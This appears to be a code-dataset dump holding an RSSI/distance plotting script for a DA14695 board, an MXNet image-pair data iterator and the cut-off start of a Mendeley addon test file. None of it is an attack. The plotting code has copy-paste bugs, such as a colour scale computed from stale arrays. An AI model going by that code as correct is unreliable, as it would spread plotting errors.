fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, \n 'orientation_exp4_%s.png' % antenna))\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=2, subplot_titles=['Line of sight',\n 'Blocked'], shared_xaxes=True)\n rssi_los_hist2d = []\n dist_los_hist2d = []\n experiment = 'distance_los'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in distance_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_los_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_los_hist2d.append(column)\n rssi_los_hist2d = np.array(rssi_los_hist2d).T\n dist_los_hist2d = np.array(dist_los_hist2d).T\n rssi_blocked_hist2d = []\n dist_blocked_hist2d = []\n experiment = 'distance_blocked'\n for filename in distance_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi - 5 < db_lim[1]:\n db_lim[1] = rssi - 5\n if rssi + 5 > db_lim[0]:\n db_lim[0] = rssi + 5\n for dist in Dist:\n if dist - 0.5 < dist_lim[0]:\n dist_lim[0] = dist - 0.5\n if dist + 0.5 > dist_lim[1]:\n dist_lim[1] = dist + 0.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1] / len(data['i_rssi'])\n rssi_blocked_hist2d.append(column)\n column = np.zeros(1000)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0] / 0.1))\n column[row_idx] = row[1] / len(Dist)\n dist_blocked_hist2d.append(column)\n rssi_blocked_hist2d = np.array(rssi_blocked_hist2d).T\n dist_blocked_hist2d = np.array(dist_blocked_hist2d).T\n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n db_lim[0], db_lim[1], -1), z=rssi_los_hist2d[int(-db_lim[0]):int(-\n db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n dist_lim[0], dist_lim[1], 0.1), z=dist_los_hist2d[int(dist_lim[0] /\n 0.1):int(dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n db_lim[0], db_lim[1], -1), z=rssi_blocked_hist2d[int(-db_lim[0]):\n int(-db_lim[1]), :], zmin=0, zmax=maxz), row=1, col=2)\n fig.add_trace(go.Heatmap(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n dist_lim[0], dist_lim[1], 0.1), z=dist_blocked_hist2d[int(dist_lim[\n 0] / 0.1):int(dist_lim[1] / 0.1), :], zmin=0, zmax=maxz), row=2, col=2)\n fig.add_trace(go.Scatter(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n 0.75, 3.25, 0.25), mode='lines', line=ref_line), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0.75, 3.25, 0.25), y=np.arange(\n 0.75, 3.25, 0.25), mode='lines', line=ref_line), row=2, col=2)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna' %\n antenna, 'xanchor': 'center', 'yanchor': 'top', 'y': 0.95, 'x': 0.5})\n fig.update_xaxes(title='Separation (m)', row=2, col=1)\n fig.update_xaxes(title='Separation (m)', row=2, col=2)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, 'distance_%s.png' % antenna)\n )\n", "step-5": "#%%\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport plotly\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport pandas as pd\nimport os\n\noutput_directory = r'C:/Users/jgamm/Desktop/rssi_measurement/2020-06-10/figures'\nantennas = ['original_whip']\nfolder = r'C:/Users/jgamm/Desktop/rssi_measurement/2020-06-10/data'\nri_filenames = []\nfor i_angle in np.arange(0, 360, 45):\n ri_filenames.append('r%di%d.csv'%(i_angle, i_angle))\n ri_filenames.append('r%di%d.csv'%(i_angle+45, i_angle))\nri_filenames.append('r360i360.csv')\nangle_filenames = ['%d.csv'%(n) for n in np.arange(0, 405, 45)]\ndistance_filenames = ['%1.2f.csv'%(n) for n in np.arange(.75, 3.25, .25)]\n\nref_line = dict(color='white', width=1)\n\n# Plot yaw data\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1,\n subplot_titles=['Initiator RSSI vs. yaw',\n 'Calculated distance vs. yaw'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp1'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi-5 < db_lim[1]:\n db_lim[1] = rssi-5\n if rssi+5 > db_lim[0]:\n db_lim[0] = rssi+5\n for dist in Dist:\n if dist-.5 < dist_lim[0]:\n dist_lim[0] = dist-.5\n if dist+.5 > dist_lim[1]:\n dist_lim[1] = dist+.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1]/len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0]/.1))\n column[row_idx] = row[1]/len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n \n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(\n x=np.arange(0, 765, 45),\n y=np.arange(db_lim[0], db_lim[1], -1),\n z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(\n x=np.arange(0, 765, 45),\n y=np.arange(dist_lim[0], dist_lim[1], .1),\n z=dist_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :],\n zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1]*16), mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna),\n 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, 'orientation_exp1_%s.png'%(antenna)))\n\n# Plot pitch data\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1,\n subplot_titles=['Initiator RSSI vs. pitch',\n 'Calculated distance vs. pitch'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp2'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi-5 < db_lim[1]:\n db_lim[1] = rssi-5\n if rssi+5 > db_lim[0]:\n db_lim[0] = rssi+5\n for dist in Dist:\n if dist-.5 < dist_lim[0]:\n dist_lim[0] = dist-.5\n if dist+.5 > dist_lim[1]:\n dist_lim[1] = dist+.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1]/len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0]/.1))\n column[row_idx] = row[1]/len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n \n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(\n x=np.arange(0, 765, 45),\n y=np.arange(db_lim[0], db_lim[1], -1),\n z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(\n x=np.arange(0, 765, 45),\n y=np.arange(dist_lim[0], dist_lim[1], .1),\n z=dist_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :],\n zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1]*16), mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna),\n 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, 'orientation_exp2_%s.png'%(antenna)))\n\n# Plot roll data\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1,\n subplot_titles=['Initiator RSSI vs. roll',\n 'Calculated distance vs. roll'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp3'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in ri_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi-5 < db_lim[1]:\n db_lim[1] = rssi-5\n if rssi+5 > db_lim[0]:\n db_lim[0] = rssi+5\n for dist in Dist:\n if dist-.5 < dist_lim[0]:\n dist_lim[0] = dist-.5\n if dist+.5 > dist_lim[1]:\n dist_lim[1] = dist+.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1]/len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0]/.1))\n column[row_idx] = row[1]/len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n \n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(\n x=np.arange(0, 765, 45),\n y=np.arange(db_lim[0], db_lim[1], -1),\n z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(\n x=np.arange(0, 765, 45),\n y=np.arange(dist_lim[0], dist_lim[1], .1),\n z=dist_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :],\n zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 765, 45), y=np.array([1]*16), mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna),\n 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, 'orientation_exp3_%s.png'%(antenna)))\n\n# Plot position data\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=1,\n subplot_titles=['Initiator RSSI vs. position',\n 'Calculated distance vs. position'],\n shared_xaxes=True)\n rssi_hist2d = []\n dist_hist2d = []\n experiment = 'orientation_exp4'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in angle_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi-5 < db_lim[1]:\n db_lim[1] = rssi-5\n if rssi+5 > db_lim[0]:\n db_lim[0] = rssi+5\n for dist in Dist:\n if dist-.5 < dist_lim[0]:\n dist_lim[0] = dist-.5\n if dist+.5 > dist_lim[1]:\n dist_lim[1] = dist+.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1]/len(data['i_rssi'])\n rssi_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0]/.1))\n column[row_idx] = row[1]/len(Dist)\n dist_hist2d.append(column)\n rssi_hist2d = np.array(rssi_hist2d).T\n dist_hist2d = np.array(dist_hist2d).T\n \n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(\n x=np.arange(0, 360, 45),\n y=np.arange(db_lim[0], db_lim[1], -1),\n z=rssi_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(\n x=np.arange(0, 360, 45),\n y=np.arange(dist_lim[0], dist_lim[1], .1),\n z=dist_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :],\n zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(0, 360, 45), y=np.array([1]*16), mode='lines', line=ref_line), row=2, col=1)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna),\n 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5})\n fig.update_xaxes(title='Angle (°)', row=2, col=1)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, 'orientation_exp4_%s.png'%(antenna)))\n\n# Plot separation data\nfor antenna in antennas:\n fig = make_subplots(rows=2, cols=2,\n subplot_titles=['Line of sight', 'Blocked'],\n shared_xaxes=True)\n rssi_los_hist2d = []\n dist_los_hist2d = []\n experiment = 'distance_los'\n dist_lim = [100, 0]\n db_lim = [-100, 0]\n for filename in distance_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi-5 < db_lim[1]:\n db_lim[1] = rssi-5\n if rssi+5 > db_lim[0]:\n db_lim[0] = rssi+5\n for dist in Dist:\n if dist-.5 < dist_lim[0]:\n dist_lim[0] = dist-.5\n if dist+.5 > dist_lim[1]:\n dist_lim[1] = dist+.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1]/len(data['i_rssi'])\n rssi_los_hist2d.append(column)\n column = np.zeros(100)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0]/.1))\n column[row_idx] = row[1]/len(Dist)\n dist_los_hist2d.append(column)\n rssi_los_hist2d = np.array(rssi_los_hist2d).T\n dist_los_hist2d = np.array(dist_los_hist2d).T\n \n rssi_blocked_hist2d = []\n dist_blocked_hist2d = []\n experiment = 'distance_blocked'\n for filename in distance_filenames:\n data = pd.read_csv(os.path.join(folder, antenna, experiment, filename))\n Dist = np.around(data['distance'], 1)\n for rssi in data['i_rssi']:\n if rssi-5 < db_lim[1]:\n db_lim[1] = rssi-5\n if rssi+5 > db_lim[0]:\n db_lim[0] = rssi+5\n for dist in Dist:\n if dist-.5 < dist_lim[0]:\n dist_lim[0] = dist-.5\n if dist+.5 > dist_lim[1]:\n dist_lim[1] = dist+.5\n dist_lim[0] = np.max([0, dist_lim[0]])\n column = np.zeros(200)\n hist = np.array(np.unique(data['i_rssi'], return_counts=True)).T\n for row in hist:\n row_idx = -int(row[0])\n column[row_idx] = row[1]/len(data['i_rssi'])\n rssi_blocked_hist2d.append(column)\n column = np.zeros(1000)\n hist = np.array(np.unique(Dist, return_counts=True)).T\n for row in hist:\n row_idx = int(np.around(row[0]/.1))\n column[row_idx] = row[1]/len(Dist)\n dist_blocked_hist2d.append(column)\n rssi_blocked_hist2d = np.array(rssi_blocked_hist2d).T\n dist_blocked_hist2d = np.array(dist_blocked_hist2d).T\n \n maxz = np.max([np.max(rssi_hist2d), np.max(dist_hist2d)])\n fig.add_trace(go.Heatmap(\n x=np.arange(.75, 3.25, .25),\n y=np.arange(db_lim[0], db_lim[1], -1),\n z=rssi_los_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=1)\n fig.add_trace(go.Heatmap(\n x=np.arange(.75, 3.25, .25),\n y=np.arange(dist_lim[0], dist_lim[1], .1),\n z=dist_los_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :],\n zmin=0, zmax=maxz), row=2, col=1)\n fig.add_trace(go.Heatmap(\n x=np.arange(.75, 3.25, .25),\n y=np.arange(db_lim[0], db_lim[1], -1),\n z=rssi_blocked_hist2d[int(-db_lim[0]):int(-db_lim[1]), :],\n zmin=0, zmax=maxz), row=1, col=2)\n fig.add_trace(go.Heatmap(\n x=np.arange(.75, 3.25, .25),\n y=np.arange(dist_lim[0], dist_lim[1], .1),\n z=dist_blocked_hist2d[int(dist_lim[0]/.1):int(dist_lim[1]/.1), :],\n zmin=0, zmax=maxz), row=2, col=2)\n fig.add_trace(go.Scatter(x=np.arange(.75, 3.25, .25), y=np.arange(.75, 3.25, .25), mode='lines', line=ref_line), row=2, col=1)\n fig.add_trace(go.Scatter(x=np.arange(.75, 3.25, .25), y=np.arange(.75, 3.25, .25), mode='lines', line=ref_line), row=2, col=2)\n fig.update_layout(title={'text': 'DA14695 Evaluation Board, %s antenna'%(antenna),\n 'xanchor': 'center', 'yanchor': 'top', 'y': .95, 'x': .5})\n fig.update_xaxes(title='Separation (m)', row=2, col=1)\n fig.update_xaxes(title='Separation (m)', row=2, col=2)\n fig.update_layout(showlegend=False)\n fig.update_yaxes(title_text='Initiator RSSI (dBm)', row=1, col=1)\n fig.update_yaxes(title_text='Calculated distance (m)', row=2, col=1)\n fig.write_image(os.path.join(output_directory, 'distance_%s.png'%(antenna)))", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import mxnet as mx import numpy as np import cv2 import random class Even_iterator(mx.io.DataIter): ''' data iterator, shuffle data but always make pairs as neighbors for verification and triplet loss ''' def __init__(self, lst_name, batch_size, aug_params=dict(), shuffle=False): super(Even_iterator, self).__init__() self.batch_size = batch_size self.aug_params = aug_params.copy() self.shuffle = shuffle self.data, self.labels = Even_iterator.load_data(lst_name) print "load data over" self.data_num = self.labels.shape[0] self.label_num = 1 if len(self.labels.shape) == 1 else self.labels.shape[1] print self.data_num, self.label_num self.reset() @staticmethod def load_data(lst_name): img_lst = [x.strip().split('\t') for x in file(lst_name).read().splitlines()] im = cv2.imread(img_lst[0][-1]) h, w = im.shape[:2] n, m = len(img_lst), len(img_lst[0]) - 2 data = np.zeros((n, h, w, 3), dtype=np.uint8) labels = np.zeros((n, m), dtype=np.int32) if m > 1 else np.zeros((n, ), dtype=np.int32) for i in range(len(img_lst)): im = cv2.imread(img_lst[i][-1]) data[i] = im labels[i] = img_lst[i][1:-1] if m > 1 else img_lst[i][1] return data, labels @staticmethod def even_shuffle(labels): ''' shuffle images lists and make pairs ''' s = [(x, int(random.random() * 1e5), i) for i, x in enumerate(labels)] s = sorted(s, key=lambda x: (x[0], x[1])) lst = [x[2] for x in s] idx = range(0, len(lst), 2) random.shuffle(idx) ret = [] for i in idx: ret.append(lst[i]) ret.append(lst[i + 1]) return ret @staticmethod def model_shuffle(labels): ''' shuffle images and images with same model are grouped together ''' models_idx = range(int(np.max(labels)) + 1) random.shuffle(models_idx) s = [(models_idx[x], int(random.random() * 1e5), i) for i, x in enumerate(labels)] s = sorted(s, key=lambda x: (x[0], x[1])) lst = [x[2] for x in s] return lst def reset(self): self.current = 0 if self.shuffle: idx = Even_iterator.even_shuffle(self.labels) # idx = Even_iterator.model_shuffle(self.labels) self.data = self.data[idx] self.labels = self.labels[idx] @property def provide_data(self): shape = self.aug_params['input_shape'] return [('data', (self.batch_size, shape[0], shape[1], shape[2]))] @property def provide_label(self): return [('softmax_label', (self.batch_size, self.label_num))] @staticmethod def augment(im, aug_params): ''' augmentation (resize, crop, mirror) ''' crop_h, crop_w = aug_params['input_shape'][1:] ori_h, ori_w = im.shape[:2] resize = aug_params['resize'] if ori_h < ori_w: h, w = resize, int(float(resize) / ori_h * ori_w) else: h, w = int(float(resize) / ori_w * ori_h), resize if h != ori_h: im = cv2.resize(im, (w, h), interpolation=cv2.INTER_LINEAR) x, y = (w - crop_w) / 2, (h - crop_h) / 2 if aug_params['rand_crop']: x = random.randint(0, w - crop_w) y = random.randint(0, h - crop_h) im = im[y:y + crop_h, x:x + crop_w, :] # cv2.imshow("name", im.astype(np.uint8)) # cv2.waitKey() im = np.transpose(im, (2, 0, 1)) newim = np.zeros_like(im) newim[0] = im[2] newim[1] = im[1] newim[2] = im[0] if aug_params['rand_mirror'] and random.randint(0, 1) == 1: newim = newim[:, :, ::-1] return newim def next(self): if self.current + self.batch_size > self.data_num: raise StopIteration shape = self.aug_params['input_shape'] x = np.zeros((self.batch_size, shape[0], shape[1], shape[2])) y = np.zeros((self.batch_size, self.label_num) if self.label_num > 1 else (self.batch_size, )) index = [] for i in range(self.current, self.current + self.batch_size): im = self.data[i] im.astype(np.float32) im = Even_iterator.augment(im, self.aug_params) x[i - self.current] = im y[i - self.current] = self.labels[i] index.append(i) x -= self.aug_params['mean'] x = mx.nd.array(x) label = mx.nd.array(y) batch = mx.io.DataBatch(data=[x], label=[label], pad=0, index=index) self.current += self.batch_size return batch
normal
{ "blob_id": "a824bd7577134227f5c136f2a4382c056f1175be", "index": 9663, "step-1": "import mxnet as mx\nimport numpy as np\nimport cv2\nimport random\n\n\nclass Even_iterator(mx.io.DataIter):\n '''\n data iterator, shuffle data but always make pairs as neighbors\n for verification and triplet loss\n '''\n def __init__(self, lst_name, batch_size, aug_params=dict(), shuffle=False):\n super(Even_iterator, self).__init__()\n self.batch_size = batch_size\n self.aug_params = aug_params.copy()\n self.shuffle = shuffle\n\n self.data, self.labels = Even_iterator.load_data(lst_name)\n print \"load data over\"\n self.data_num = self.labels.shape[0]\n self.label_num = 1 if len(self.labels.shape) == 1 else self.labels.shape[1]\n print self.data_num, self.label_num\n self.reset()\n\n @staticmethod\n def load_data(lst_name):\n img_lst = [x.strip().split('\\t')\n for x in file(lst_name).read().splitlines()]\n im = cv2.imread(img_lst[0][-1])\n h, w = im.shape[:2]\n n, m = len(img_lst), len(img_lst[0]) - 2\n data = np.zeros((n, h, w, 3), dtype=np.uint8)\n labels = np.zeros((n, m), dtype=np.int32) if m > 1 else np.zeros((n, ), dtype=np.int32)\n\n for i in range(len(img_lst)):\n im = cv2.imread(img_lst[i][-1])\n\n data[i] = im\n labels[i] = img_lst[i][1:-1] if m > 1 else img_lst[i][1]\n\n return data, labels\n\n @staticmethod\n def even_shuffle(labels):\n '''\n shuffle images lists and make pairs\n '''\n s = [(x, int(random.random() * 1e5), i) for i, x in enumerate(labels)]\n s = sorted(s, key=lambda x: (x[0], x[1]))\n lst = [x[2] for x in s]\n\n idx = range(0, len(lst), 2)\n random.shuffle(idx)\n ret = []\n for i in idx:\n ret.append(lst[i])\n ret.append(lst[i + 1])\n\n return ret\n\n @staticmethod\n def model_shuffle(labels):\n '''\n shuffle images and images with same model are grouped together\n '''\n models_idx = range(int(np.max(labels)) + 1)\n random.shuffle(models_idx)\n s = [(models_idx[x], int(random.random() * 1e5), i) for i, x in enumerate(labels)]\n s = sorted(s, key=lambda x: (x[0], x[1]))\n lst = [x[2] for x in s]\n\n return lst\n\n def reset(self):\n self.current = 0\n if self.shuffle:\n idx = Even_iterator.even_shuffle(self.labels)\n # idx = Even_iterator.model_shuffle(self.labels)\n self.data = self.data[idx]\n self.labels = self.labels[idx]\n\n @property\n def provide_data(self):\n shape = self.aug_params['input_shape']\n\n return [('data', (self.batch_size, shape[0], shape[1], shape[2]))]\n\n @property\n def provide_label(self):\n return [('softmax_label', (self.batch_size, self.label_num))]\n\n @staticmethod\n def augment(im, aug_params):\n '''\n augmentation (resize, crop, mirror)\n '''\n crop_h, crop_w = aug_params['input_shape'][1:]\n ori_h, ori_w = im.shape[:2]\n resize = aug_params['resize']\n if ori_h < ori_w:\n h, w = resize, int(float(resize) / ori_h * ori_w)\n else:\n h, w = int(float(resize) / ori_w * ori_h), resize\n\n if h != ori_h:\n im = cv2.resize(im, (w, h), interpolation=cv2.INTER_LINEAR)\n\n x, y = (w - crop_w) / 2, (h - crop_h) / 2\n if aug_params['rand_crop']:\n x = random.randint(0, w - crop_w)\n y = random.randint(0, h - crop_h)\n im = im[y:y + crop_h, x:x + crop_w, :]\n\n # cv2.imshow(\"name\", im.astype(np.uint8))\n # cv2.waitKey()\n\n im = np.transpose(im, (2, 0, 1))\n newim = np.zeros_like(im)\n newim[0] = im[2]\n newim[1] = im[1]\n newim[2] = im[0]\n\n if aug_params['rand_mirror'] and random.randint(0, 1) == 1:\n newim = newim[:, :, ::-1]\n\n return newim\n\n def next(self):\n if self.current + self.batch_size > self.data_num:\n raise StopIteration\n\n shape = self.aug_params['input_shape']\n x = np.zeros((self.batch_size, shape[0], shape[1], shape[2]))\n y = np.zeros((self.batch_size, self.label_num) if self.label_num > 1\n else (self.batch_size, ))\n index = []\n for i in range(self.current, self.current + self.batch_size):\n im = self.data[i]\n im.astype(np.float32)\n im = Even_iterator.augment(im, self.aug_params)\n x[i - self.current] = im\n y[i - self.current] = self.labels[i]\n index.append(i)\n\n x -= self.aug_params['mean']\n\n x = mx.nd.array(x)\n label = mx.nd.array(y)\n\n batch = mx.io.DataBatch(data=[x], label=[label], pad=0, index=index)\n self.current += self.batch_size\n\n return batch\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
# -*- coding: utf-8 -*- from nose.tools import * # noqa import mock import httpretty from tests.base import OsfTestCase from tests.factories import AuthUserFactory, ProjectFactory import urlparse from framework.auth import Auth from website.addons.mendeley.tests.factories import ( MendeleyAccountFactory, MendeleyUserSettingsFactory, MendeleyNodeSettingsFactory ) from framework.exceptions import HTTPError from website.addons.mendeley.provider import MendeleyCitationsProvider from website.addons.mendeley.serializer import MendeleySerializer from utils import mock_responses API_URL = 'https://api.mendeley.com' class MockNode(object): addon = None @property def is_deleted(self): return False @property def is_public(self): return True def get_addon(self, name): if name == 'mendeley': return self.addon return None class MockFolder(object): def __init__(self, **kwargs): for k, v in kwargs.iteritems(): setattr(self, k, v) class MendeleyViewsTestCase(OsfTestCase): def setUp(self): super(MendeleyViewsTestCase, self).setUp() self.account = MendeleyAccountFactory() self.user = AuthUserFactory(external_accounts=[self.account]) self.account.display_name = self.user.fullname self.account.save() self.user_addon = MendeleyUserSettingsFactory(owner=self.user, external_account=self.account) self.project = ProjectFactory(creator=self.user) self.node_addon = MendeleyNodeSettingsFactory(owner=self.project) self.node_addon.set_auth(external_account=self.account, user=self.user) self.provider = MendeleyCitationsProvider() #self.user_addon.grant_oauth_access(self.node_addon, self.account, metadata={'lists': 'list'}) self.node = MockNode() self.node.addon = self.node_addon self.id_patcher = mock.patch('website.addons.mendeley.model.Mendeley.client_id') self.secret_patcher = mock.patch('website.addons.mendeley.model.Mendeley.client_secret') self.id_patcher.__get__ = mock.Mock(return_value='1234567890asdf') self.secret_patcher.__get__ = mock.Mock(return_value='1234567890asdf') self.id_patcher.start() self.secret_patcher.start() def 